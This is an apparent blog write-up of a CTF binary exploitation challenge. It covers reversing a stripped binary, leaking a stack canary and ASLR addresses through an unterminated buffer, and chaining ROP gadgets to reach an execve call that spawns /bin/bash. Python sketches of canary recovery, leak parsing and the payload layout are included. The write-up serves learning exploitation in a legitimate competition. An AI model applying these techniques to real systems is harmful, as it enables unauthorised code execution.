Pwny Racing Community Challenge 7 Writeup

Published on 2019-11-13 by rkevin

I stumbled upon Pwny Racing a while ago when I was revisiting some of the challenges on OverTheWire to get inspiration for ECS189. Long story short, procrastination led to Twitter, which led to Pwny Racing, a binary exploitation CTF. The Community Challenge section contains some publicly available challenges, and when I found it the solvers list under challenge 7 said TBD. Sounds interesting, might as well give it a shot!

Warning: This is gonna be ranty AF, and in retrospect I explained some stuff in waaaaay too much detail. Proceed with caution.

Initial analysis

We download the provided tar file, and there's the binary and information on how to connect to the remote server:

1

The binary is stripped, but that doesn't stop ghidra from doing its magic. After opening the binary in ghidra, we need to find the main function. In a typical gcc-compiled binary linked against glibc, the entrypoint calls a function called __libc_start_main, and the first argument passed to it is the address of the main function:

2

Found it! Stripped symbols don't stop us. Let's rename this "main" and look at what's inside:

3

Hoo boy, there's a lot of stuff. First of all, what the heck is main doing taking in 11 arguments??? Oh right, because the symbols are stripped, ghidra has to guess what arguments each function takes, and it's not perfect (ghidra: I'm doing the best I can :C). We can help it out a bit by retyping main.

We know that the main function usually takes either zero arguments, two arguments (argc and argv) or three arguments (with an additional envp, for environment variables). We can just keep the first three arguments, retype them, and dump the rest:

4

Next up, there are two unknown functions inside main, currently named FUN_00100972 and FUN_001008da because ghidra doesn't know what to call them. What do they do?

5

The first function just prints out one message and returns, so we can just rename it print_welcome and call it a day.

We also see some __stack_chk_fail stuff. Oh god this binary has canaries. Uh oh. I'll explain later. What does the second function do?

6

It is called twice with argv and envp as arguments, which is kinda odd.

7

Hmm, lots of loops and 0s. The outermost if statement is just a sanity check to make sure the argument is not null. The outer loop looks like this:

local_20 = argv;
while (*local_20 != NULL) {   // the array ends with a NULL entry
    local_18 = *local_20;     // get the current element from argv
    loop_that_does_something_to_local_18;
    local_20++;               // next element
}

So it's safe to say this loop iterates over every element in the array of strings and does something to it. What's the inner loop again?

8

Huh, okay, so it's zeroing out every element in argv and envp, along with destroying their pointers. This is probably to prevent us from using strings in the arguments and environment variables. Okay then, I'll rename the function clear because I'm the best at naming things. (/s)

9

Okay, time for the main dish! There's a lot of scary global variables here, but upon a closer look there are only two of them. DAT_0030202c gets assigned the return value of fgetc in the inner loop, so it probably holds the current character of the input. DAT_00302030 gets set to 0 at the start and increments every time the inner loop runs once, so it's probably a position counter. Once we rename it like that, the loop becomes a lot clearer:

10

The inner loop keeps reading characters from stdin until the input is -1(EOF), 10(\n), 0xd(\r) or if the input length exceeds 0x200. Every time it reads a character it puts it in local_58, which is a buffer that's 72 bytes long. Aha! We have found our vulnerability. This is a poor-man's fgets, but it reads 0x200 characters into a buffer with 72 bytes. Finally, if you give it an empty input, the program breaks out of the loop and returns.
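To make the overflow concrete, here's a rough Python model of that loop. It's only a sketch based on my reading of the decompilation: the names read_like_binary, BUF_SIZE and MAX_READ are made up for illustration, and the real loop bound may be off by one from what's modeled here.

```python
import io

BUF_SIZE = 72      # size of local_58 according to the decompilation
MAX_READ = 0x200   # approximate loop bound according to the decompilation

def read_like_binary(stream):
    """Copy bytes until EOF, newline, carriage return, or MAX_READ bytes."""
    out = bytearray()
    while len(out) < MAX_READ:
        ch = stream.read(1)
        if ch == b"" or ch in (b"\n", b"\r"):
            break
        out += ch
    return bytes(out)

# 100 bytes of input, then a newline; anything after the newline is not read.
data = read_like_binary(io.BytesIO(b"A" * 100 + b"\n" + b"ignored"))
overflow = max(0, len(data) - BUF_SIZE)
print(len(data), overflow)  # 100 28
```

Nothing in the loop compares the position against 72, so every byte past the buffer lands on whatever comes next on the stack.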

Poking around, we also find an unused function:

11

Immediately, execve jumps out: This is our golden ticket to RCE! Looking closer at the arguments, we can see that if we pass in /bin/bash as param_3, we will get the shell we wanted! param_1 and param_2 are unused for some reason. Anyways, I'll name this function TARGET since it's the endgoal.

Battle plans

Now that we have the info we need and the goal in mind, we need to figure out a way to get there. Using the poor-man's gets we can overflow the stack and gain control of the instruction pointer, but the canary is in the way. Welp, time to face the issue at hand.

If you aren't aware, a stack canary is a value placed on the stack right before the return address. It's set to a randomized value at the start of the function and is compared against the right value at the end. If we're going to do a standard buffer overflow, in order to overwrite the return address we have to trample all over the canary, destroying its value. Once our attempt is detected by the canary, a function called __stack_chk_fail is called, and the program quits immediately. We need to either a) write to the return address without writing to the canary (probably impossible since we don't have an arbitrary write primitive) or b) find a way to leak the canary value, so when we bulldoze over the canary we can set it to the right value.

For now, let's assume we can bypass the canary somehow. We need to call TARGET with the right arguments. However, this is a 64-bit binary, so the first few arguments are passed in registers rather than on the stack. Ghidra tells us which arguments are in which registers:

12

We can't really touch registers just by writing on the stack, so we have to build some sort of ROP chain to get the argument in RDX. We also need to actually put the argument somewhere (we want to execute /bin/bash, so we have to give TARGET a pointer to that string). We can put /bin/bash in our input easily, but we need to leak the address of our input somehow, since this binary has ASLR enabled. We probably also need to leak the address of the text section, so we can know where to return to for our ROP chain. Finally, we have a battle plan:

  1. Leak the canary, buffer address and text address
  2. Put the string "/bin/bash" on the stack
  3. Build ROP chain to put the right address in rdx
  4. Call TARGET
  5. Profit!

Leaking addresses

While doing the challenge, I already had sort of an idea of how to leak the canary. Before that, let's figure out where the canary is on the stack. I'm using pwntools to write my exploit (it's awesome btw!), so let's write some boilerplate to talk to the program first.

From ghidra, I know this program is probably safe and won't just rm -rf / my system. When I run the program, this happens:

13

We can already see some interesting stuff happening, but let's ignore that for now. The program works exactly as expected. We can write code that recognizes the word 'buffer' and gives us the output. Let's try this:

14

It works! We can also get rid of the starting : output: and the trailing \n by just being lazy, counting the characters and hardcoding it. We can also write a function that does this for us:

15

Nice! Now we have a nice interface we can use to talk to the server. As you might've noticed, when we send 'abc', we get back some additional junk! ('abc4\xfc\x7f') It turns out that the poor-man's gets doesn't even try to put a trailing '\0' in the string. We can pretty much read anything we want to provided it doesn't contain '\0's! Let's find the canary first, and then we'll try to leak stuff.
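Here's a tiny model of why the junk shows up, assuming the program echoes the buffer as a C string (so printing stops at the first null byte). The stale stack contents and the printed_output helper are invented for illustration; only the 'abc4\xfc\x7f' result mirrors what we saw above.

```python
def printed_output(memory: bytes) -> bytes:
    """Return what a C-style string print would show: bytes up to the first NUL."""
    end = memory.find(b"\x00")
    return memory if end == -1 else memory[:end]

# Made-up stale stack contents: three junk bytes, then leftovers from earlier calls.
stack = bytearray(b"\x10\x20\x30" + b"4\xfc\x7f" + b"\x00\x00")
user_input = b"abc"
stack[:len(user_input)] = user_input   # the read loop writes no terminator

leak = printed_output(bytes(stack))
print(leak)  # b'abc4\xfc\x7f'
```

The longer our input, the further along the stack the "string" starts leaking from, which is exactly the knob we'll be turning.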

We know the buffer is 72 characters, so what happens if we do 73?

16

Got it! We see a stack smashing detected message, so we know the canary has been triggered. The canary is right after our 72-byte buffer. We can also see leaked information after our output, so we have leaked the canary correctly except for its first byte, which our 73rd character overwrote! That's no loss: glibc stack canaries on Linux are designed to start with a null byte, so if someone forgets to null-terminate a string on the stack, the canary terminates it and no information gets leaked. Unfortunately for the canary, we can overwrite that one null byte and just set it back to '\0' afterwards! Let's write the code to do that and see if it works or not. Let's also get rid of the r.interactive() and change it to just print everything out since we know we're just crashing the program:

17
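The canary recovery described above boils down to "take the 7 bytes after our 73-byte input and stick the null byte back in front". A minimal sketch using only the standard library (recover_canary and the fake canary value are made up for this example, they're not from my actual exploit):

```python
import struct

def recover_canary(leak: bytes) -> int:
    """leak: the bytes echoed back right after our 73 filler bytes."""
    if len(leak) < 7:
        # A NUL inside the canary cuts the leak short; just rerun the exploit.
        raise ValueError("leak too short; the canary probably contains a NUL byte")
    # Restore the low NUL byte we overwrote, then read as little-endian u64.
    return struct.unpack("<Q", b"\x00" + leak[:7])[0]

# Simulate a leak: the canary minus its first byte, followed by unrelated bytes.
fake_canary = 0x1122334455667700
leak = struct.pack("<Q", fake_canary)[1:] + b"\x30\x12"
canary = recover_canary(leak)
print(hex(canary))  # 0x1122334455667700
```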

Nice! Notice the SIGSEGV instead of the stack smashing detected message. This means we have successfully bypassed the canary! We can also examine some stuff using gdb (A nice trick: on systems with coredumpctl, you can run gdb on the most recently crashed program by simply typing coredumpctl debug):

18

Yep! The program segfaulted at a return, and the value on the stack is 0x4242424242424242, a bunch of 'B's. If we test further (or rely on the knowledge that the stack looks like [stack canary] [saved rbp] [return address]), we can figure out the return address is placed 8 bytes after the canary. Now we have control over the instruction pointer!
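That layout can be written down as a small payload builder. This is a sketch with the standard library's struct module rather than pwntools, and overflow_payload plus the sample values are hypothetical names and numbers for illustration:

```python
import struct

BUF_SIZE = 72  # bytes between the start of the buffer and the canary

def overflow_payload(canary: int, ret_addr: int, saved_rbp: int = 0) -> bytes:
    """Layout: [72 bytes of filler][canary][saved rbp][return address]."""
    return b"A" * BUF_SIZE + struct.pack("<QQQ", canary, saved_rbp, ret_addr)

payload = overflow_payload(canary=0x1122334455667700,
                           ret_addr=0x4242424242424242)
print(len(payload))   # 96
print(payload[88:])   # b'BBBBBBBB'
```

The return address starts at offset 72 + 8 + 8 = 88, i.e. 8 bytes after the end of the canary.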

Well, that was very beneficial. Now that we have defeated the canary, we are one step closer to our goal! We leaked the canary from abusing the fact that our buffer isn't null terminated. Can we abuse anything else this way? Earlier on we noticed even when we entered a short string into the buffer, we still get random stuff from the end of our input. This is because the buffer wasn't zeroed out. Before main was run, a function called __libc_start_main was called, which sets everything up before main. This will call other functions as well and will definitely leave breadcrumbs on the stack. Let's see what we can find on the stack:

19

We see an address of some sort! It starts with 0x7ffe... so it looks like a stack address of some sort. Sure enough, if we fire up gdb and examine around that area...

20

... we see a bunch of Bs in that area! However, we had to overwrite the least significant byte to get it to print out. If we run this several times we will see that the least significant byte is not a constant, so while this is good enough to give us a 1/256 chance of getting the right address, can we do better? Let's leak all the stuff we can and see what happens. We only need to worry about stuff that's at an offset of a multiple of 8, since on a 64-bit machine, everything on the stack is aligned to 8 bytes:

21

We see a lot of interesting addresses there! Of course, this output is a bit hard to decipher (since Python tries to display printable characters as themselves rather than hex), so let's unpack it into a nice address for printing! Pwntools has utilities that do this nicely:

22

The unpack function takes in the bytes object and also how many bits it has (in our case 64 bits), and unpacks it as a little-endian unsigned integer (which is frankly what a pointer is under the hood). However, we aren't always getting 8 bytes cleanly every time, because if the address contains a '\0' we don't get anything after it. Let's just assume all the missing most significant bytes are '\0' and pad the results we get to 8 bytes before unpacking:

23
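For reference, the pad-then-unpack trick looks roughly like this with nothing but the standard library (struct is standing in for the pwntools helper here, and unpack_leak plus the sample bytes are made up for the example):

```python
import struct

def unpack_leak(raw: bytes) -> int:
    """Pad a truncated leak with NUL bytes on the high end, then read a u64."""
    return struct.unpack("<Q", raw[:8].ljust(8, b"\x00"))[0]

# A userspace pointer usually leaks as 6 bytes: the top two bytes are NUL,
# so the echoed string stops before them.
addr = unpack_leak(b"\x1d\xfc\x55\x55\x55\x55")
print(hex(addr))  # 0x55555555fc1d
```

Padding on the right is the correct side because the value is little-endian: the bytes we're missing are the most significant ones.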

Nice! We got some very nice values from the stack. From intuition, the ones that start with 0x7f are stack addresses, and the ones starting with 0x56 are addresses in the text section (in other words, executable code). Let's confirm what we're guessing is right first. I'll use the addresses at input offset 24 and 64, just because these were the ones I stumbled upon while solving it:

24

OK, if we check the instructions at the leaked text address, we get some add, cmp and jne instructions. If we check the leaked stack address minus 0x100, we find some 'A's and a bunch of 'B's that we were using to crash the program. 24 'A's, in fact. Let's run the program again and examine the results:

25

26

Nice! We see the pointers changing, but when we examine the instructions and memory they're pointing to, we find they are exactly the same as last time! We now know that they're stable, so if we find their offsets from the things we care about (namely the base address of the text section, as well as the address of our input buffer), we can get those addresses!

Finding the base address of the buffer is easy enough. We already know that the leaked stack address minus 0x100 lands in the middle of the buffer, with 24 'A's from there to the end. We put 72 'A's in the buffer, so the start is another 72-24=48=0x30 bytes further back. Our buffer should start at the leaked address minus 0x130.

We know the address in the text section resolves to an add rbx,0x1 instruction. Let's see if objdump can find it:

27

Found it! It's at offset 0xc1d from the base of the binary. That means if we take the leaked address and subtract 0xc1d, we get the base! Let's clean up our code a bit and grab the important addresses.
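The arithmetic is simple enough to sketch on its own. The two offsets come straight from the analysis above; resolve_bases and the sample leak values are invented for this example and will differ on every run:

```python
STACK_LEAK_TO_BUFFER = 0x130  # leaked stack pointer minus this = start of buffer
TEXT_LEAK_OFFSET = 0xc1d      # offset of the add rbx,0x1 instruction in the binary

def resolve_bases(stack_leak: int, text_leak: int):
    """Turn the two leaked pointers into (buffer address, text base)."""
    buf_addr = stack_leak - STACK_LEAK_TO_BUFFER
    text_base = text_leak - TEXT_LEAK_OFFSET
    return buf_addr, text_base

# Made-up leak values, just to exercise the math.
buf_addr, text_base = resolve_bases(0x7ffe00001230, 0x560000000c1d)
print(hex(buf_addr), hex(text_base))  # 0x7ffe00001100 0x560000000000
```

A handy sanity check: the base should come out page-aligned (low 12 bits all zero). If it doesn't, one of the leaks was probably truncated.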

28

Nice! By the way, I made a change and converted the canary to an integer just to make things consistent, and cast it into a bytes object at the end using p64() (another utility provided by pwntools). Let's verify these addresses are actually right by examining them using gdb:

29

These look right! The text section starts with 0x464c457f (ELF header) and our buffer has 72 'A's in it. Now we have all the pieces of the puzzle and all that's left is to find the ROP chain!

ROP chain

Our ultimate goal is to call the TARGET function with the address of '/bin/bash' in the rdx register. I'm using ROPgadget to find any interesting ROP gadgets we can use. We're looking for something to put stuff in rdx.

30

Ah, crap. There are no usable gadgets! Is the program working?

31

It's working alright, there just aren't any good gadgets for rdx. In retrospect, the reason why TARGET ignores the first two arguments and forces us to use the third is probably to force the use of rdx and annoy us. We need a better solution.

20 minutes of manual searching for gadgets in objdump later

UGH! This is taking forever! Does ROPgadget have options for this?

32

.

33

Of course, it wouldn't be me if I didn't overlook something simple that would save tons of agony. Oh well. What if we bump up the depth?

34

Finally, some actually usable gadgets! The one at 0xc10 seems interesting, since it moves r15 into rdx. If we can figure out a way to write to r15 we can get to rdx! There's a slight caveat, because it doesn't end in a normal ret instruction. Instead, it does call qword ptr [r12 + rbx*8]. We need to put the address we want to call somewhere on the stack (which we can do since we know the buffer's address!), and modify r12 and rbx to point there. Mental checklist: we need to modify r15, r12 and rbx. Is there a gadget for r15?

35

Wow, we got insanely lucky! Not only is there a gadget to write to r15, it also changes r12 and rbx. Just what we need! Finally, let's construct the ROP chain:

  1. Return to text+0xc2a (pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret)
  2. Pop the values into the registers: rbx=0, rbp=0, r12=X, r13=0, r14=0, r15=Y
  3. Return to text+0xc10 (mov rdx, r15 ; mov rsi, r14 ; mov edi, r13d ; call qword ptr [r12 + rbx*8])
  4. rdx=r15=Y, rsi=0, edi=0, call the address located at (r12+rbx*8=X+0=X)

Therefore, if we set Y to point to the string '/bin/bash', and X to point to a pointer (note the double pointer!) that contains the address of TARGET, we win!
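Here's one way the chain above could be laid out in memory, as a sketch with the standard library instead of pwntools. The gadget offsets come from the steps above; everything else is an assumption made for illustration: build_payload, the choice to store the string at buffer offset 0 and the TARGET pointer at offset 16, and especially target_offset, which is a placeholder and not the real offset of TARGET.

```python
import struct

BUF_SIZE = 72
POP_GADGET = 0xc2a        # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
MOV_CALL_GADGET = 0xc10   # mov rdx, r15; ...; call qword ptr [r12 + rbx*8]
PTR_SLOT = 16             # assumed spot in the buffer for the pointer to TARGET

def q(value: int) -> bytes:
    """Pack a 64-bit little-endian value."""
    return struct.pack("<Q", value)

def build_payload(text_base, buf_addr, canary, target_offset):
    # Buffer contents: the string (Y points here), then the pointer (X points here).
    buf = b"/bin/bash\x00".ljust(PTR_SLOT, b"\x00")
    buf += q(text_base + target_offset)
    buf = buf.ljust(BUF_SIZE, b"A")
    chain = [
        text_base + POP_GADGET,
        0,                    # rbx
        0,                    # rbp
        buf_addr + PTR_SLOT,  # r12 = X, address of the pointer to TARGET
        0,                    # r13 -> edi
        0,                    # r14 -> rsi
        buf_addr,             # r15 = Y -> rdx, address of "/bin/bash"
        text_base + MOV_CALL_GADGET,
    ]
    return buf + q(canary) + q(0) + b"".join(q(v) for v in chain)

# All values below are made up; target_offset in particular is hypothetical.
payload = build_payload(text_base=0x560000000000, buf_addr=0x7ffe00001100,
                        canary=0x1122334455667700, target_offset=0x9a0)
print(len(payload))  # 152
```

With rbx=0, the call dereferences r12 directly, which is why X has to be the address of a pointer rather than the address of TARGET itself.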

Putting it all together

After leaking all the important info, we want to send this exploit string:

36

Finally, we send an empty line to trigger the exploit. Let's see if it's successful:

37

It works! We now have a shell! Now the last step we need to do is to exploit it on the actual remote machine. In the archive we downloaded there is a file telling us the hostname and port to connect to. One of the major benefits of pwntools is once you finish developing the exploit on a local binary, you can just swap out r=process() with r=remote() and your exploit now talks to the remote server instead!

38

And just like that, we got the flag!

A quick note, this exploit does have a slight chance of failing, just in case the canary or a pointer we're trying to leak has a pesky \0 or \n in it. If that happens, just run it again. My exploit code is downloadable here and is now available on GitHub (I originally planned to submit a pull request once I got the OK for it).
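If you'd rather detect the unlucky case than find out from a crash, a check along these lines would do. It's a sketch, not part of my exploit: survives and BAD_BYTES are made-up names, and I'm also treating \r as bad since the read loop stops on it too.

```python
import struct

BAD_BYTES = b"\x00\n\r"  # NUL truncates a leak; \n and \r end the input line

def survives(value: int, skip_low_byte: bool = False, significant: int = 6) -> bool:
    """True if none of the value's significant bytes would break the exploit."""
    raw = struct.pack("<Q", value)
    start = 1 if skip_low_byte else 0
    return not any(b in BAD_BYTES for b in raw[start:start + significant])

# Pointers: only the low 6 bytes matter, the top two are always NUL.
print(survives(0x7ffe12345678))   # True
print(survives(0x7ffe12000a78))   # False
# Canary: the low byte is NUL by design, so skip it and check the other 7.
print(survives(0x1122334455667700, skip_low_byte=True, significant=7))  # True
```

If any check fails, reconnect and try again; every run gets a fresh canary and fresh addresses.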

I'm not sure when the challenge was posted (I stumbled upon it at around 5PM Oct 27th PST), so it's very likely the challenge had been up for a while and I'm not the first one to solve it. Regardless, it took me less than 2 hours to solve, so I'm pretty damn proud of myself, especially since I don't have a lot of binary exploitation experience and I was so sure this was out of my league when I saw ASLR and stack canaries were enabled. This has been a very fun experience and I'd like to solve all the other challenges there eventually (read as: once I want to procrastinate on homework again). Definitely check out Pwny Racing and their community challenge section!